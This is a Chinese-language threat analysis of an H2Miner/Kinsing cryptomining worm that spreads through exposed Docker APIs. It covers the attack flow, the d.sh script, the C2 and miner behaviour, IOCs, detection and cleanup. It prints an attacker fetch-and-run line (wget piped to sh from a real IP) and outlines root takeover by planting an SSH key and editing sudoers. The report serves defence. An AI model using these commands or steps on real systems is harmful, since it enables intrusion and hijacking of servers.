一、概述
近期捕获到H2Miner挖矿蠕虫变种病毒,H2Miner是一个linux下的挖矿病毒,是用Golang编码的,该变种利用Docker swarm开放一个TCP端口2375(或2376)攻击云服务器,下载恶意脚本和恶意程序进行挖矿,然后试图将恶意软件传播到其他云服务器。攻击者利用失陷的主机进行挖矿,会消耗CPU资源,严重影响主机的使用。从所获得的新变种与老版本比较后,之间没有太多的变化,主要是更改了文件中的后门地址以及相关的文件名,该家族的脚本名称不是固定的,是按照英文字母a-z为基础命名的,此次捕获的脚本是d.sh。攻击者从利用开放端口开始,通过规避策略和横向移动,一直到部署恶意矿工的全流程执行
下面的流程图说明了完整的攻击流程
二、漏洞利用
swarm是Docker官方提供的一款编排容器的工具,其主要作用是把若干台Docker主机抽象为一个整体,并且通过默认端口2375远程操控Docker管理这些Docker主机上的各种资源。如要使用swarm,则必须让Docker开放其HTTP的API。默认情况下这个API没有开启,而开启此API需要在启动时加入-H参数,执行-H tcp://0.0.0.0:2375,亦或2376
安装Docker需要使用root或sudo权限,也就是说,容器内部的root用户就是宿主机的root用户,一旦挂载目录,就可以在容器内部以宿主机的root用户身份对挂载的文件系统随意修改了。
Docker是以root权限运行的,无法直接控制宿主机,所以可以先将本地文件或目录挂载到容器内,在容器内这些文件和目录是可以修改的。例如把/root/挂载到容器内,再将攻击者的ssh公钥/.ssh/id_rsa.pub的内容写到入被攻击Docker宿主机的/root/.ssh/authorized_keys文件中,修改权限为600,此时就可以以root用户登录了。
本地获取ssh公钥
将公钥复制到被攻击的.ssh/authorized_keys文件中
挂载目录并且修改 /etc/sudoers 文件,直接配置成免密码,sudo免密切换root
如果主机不允许root用户直接登录,可以通过挂载 /etc/ssh/sshd_config 查看配置。那就换一个用户写入,并且修改 /etc/sudoers 文件,sudo vim etc/sudoers,
此时,拿下了主机的root权限,或者拥有sudo权限的用户,执行wget -q -O – http://93.189.43.3/d.sh|sh(服务已关)
三、样本分析
3.1d.sh
d.sh,一共670行代码,发现脚本执行了以下操作
1.禁用安全措施并清除日志: echo SELINUX=disabled >/etc/selinux/config
2.卸载安全应用程序,清除他挖矿程序和服务进程
3.kill其他加密矿工相关的文件,其中大部分是/tmp,/var/tmp
4.killdocker容器服务进程,并删除镜像
5.下载Kinsing,并运行
6.创建定时任务,每分钟运行一次,并且指向域名,下载脚本
停止linux安全内核模块
删除系统日志
下载2个卸载阿里云安全服务的脚本
netstat根据端口查看服务进程,端口是竞争挖矿木马惯用端口范围,检测主机上是否存在其他的挖矿病毒,有的话直接kill
ps 根据服务名称和进程路径查看进程,都是挖矿木马类型
根据挖矿ip,矿池域名查看服务进程(门罗币)
删除其他挖矿木马相关文件
停止docker容器,并删除镜像
download函数会检查是否存在kinsing,并校验文件的MD5,然后download2函数下载Kinsing文件并校验MD5值是否正确,如果MD5不正确或者文件不存在就调用 download3函数继续下载Kinsing
crontab创建定时任务,确保d.sh持久化
定时任务,每一分钟执行一次,访问url(195.3.146.118)下载d.sh
根据定时任务名称删除其他任务
3.2恶意程序Kinsing
Kinsing执行了以下操作
1.与C&C服务器通信
2.利用masscan扫描端口
3.Redis暴力破解
4.下载spre.sh脚本
5.下载cron.sh脚本
6.释放kdevtmpfsi 矿工
与C&C服务器185.154.53.140进行通信
获取任务的函数
获取C2地址
RC4解密得到C2地址
执行相关任务的函数
masscan,是一款渗透工具,masscan是一种Internet规模的端口扫描程序,可用于对Internet或内部网络。速度足以在3分钟内扫描Internet的端口。
获取目标
创建firewire.sh脚本并运行
针对Redis暴力破解
用AUTH命令进行口令认证:
spre.sh
检索id_rsa*,/.ssh/config,/.bash_history,HostName进行匹配,并找到相对的身份信息,利用ssh|scp横向传播下载并运行shell脚本
每20次SSH|SCP连接尝试后会休眠20秒,这种可能是为了躲避发现
cron.sh
根据进程名,ip进行kill,
创建定时任务,每分钟执行并且下载unk.sh
kdevtmpfsi
释放文件并执行的函数
修改权限并启动
sub_400D50方法有连接矿池域名,登录矿池,申请内存的行为
sub_40CD70矿池配置config.json,连接矿池域名以及钱包地址
挖矿程序版本号5.5.0
矿池账户密码
配置CPU最大线程
搜索挖矿关键字miner
这部分由以下函数进行调用,获取CPU信息,系统CPU时间
四、IOCs
IP
104.192.141.1
93.189.43.3
195.3.146.118
185.154.53.140
194.38.20.199
MD5
d.sh
be17040e1a4eaf7e2df8c0273ff2dfd2
spre.sh
639d87d54aa57371cc0bf82409503311
kinsing
52ca5bc47c84a748d2b349871331d36a
kdevtmpfsi
8c6681daba966addd295ad89bf5146af
URL
https://bitbucket.org/tromdiga1/git/raw/master/kinsing
http://93.189.43.3/kinsing
http://195.3.146.118/d.sh
http://93.189.43.3/d.sh
http://93.189.43.3/spr.sh
http://185.191.32.198/unk.sh
五、监测方法
1.利用威胁情报,监控主机是否连接矿池域名
2.监控异常服务进程的CPU利用率,设置告警阈值
3.监控挖矿程序惯用端口,以及挖矿程序惯用进程名,挖矿程序生成的文件
4.遍历root/.ssh/中的密钥信息是否被清空
5.是否存在异常未知的定时任务,尤其是指向未知域名
6.监控执行批量及高位命令行kill,rm,wget -q -O,chmod,curl。挖矿程序高危路径/tmp,/var/tmp
六、清理挖矿建议
利用top查看cpu使用情况
再根据PID进程号,查看进程的指定程序路径,或者find服务名,检索文件位置
ps – ef | grep kedevtmpfsi 查看挖矿进程,删除挖坑程序,守护进程会一直重启它
所以需要先删除守护进程,再kill kedevtmpfsi,此时还有最重要的一步,就是先删除定时任务,要不然,挖矿程序还会定时启动,因为d.sh脚本会再次下载挖矿程序,再次启动,
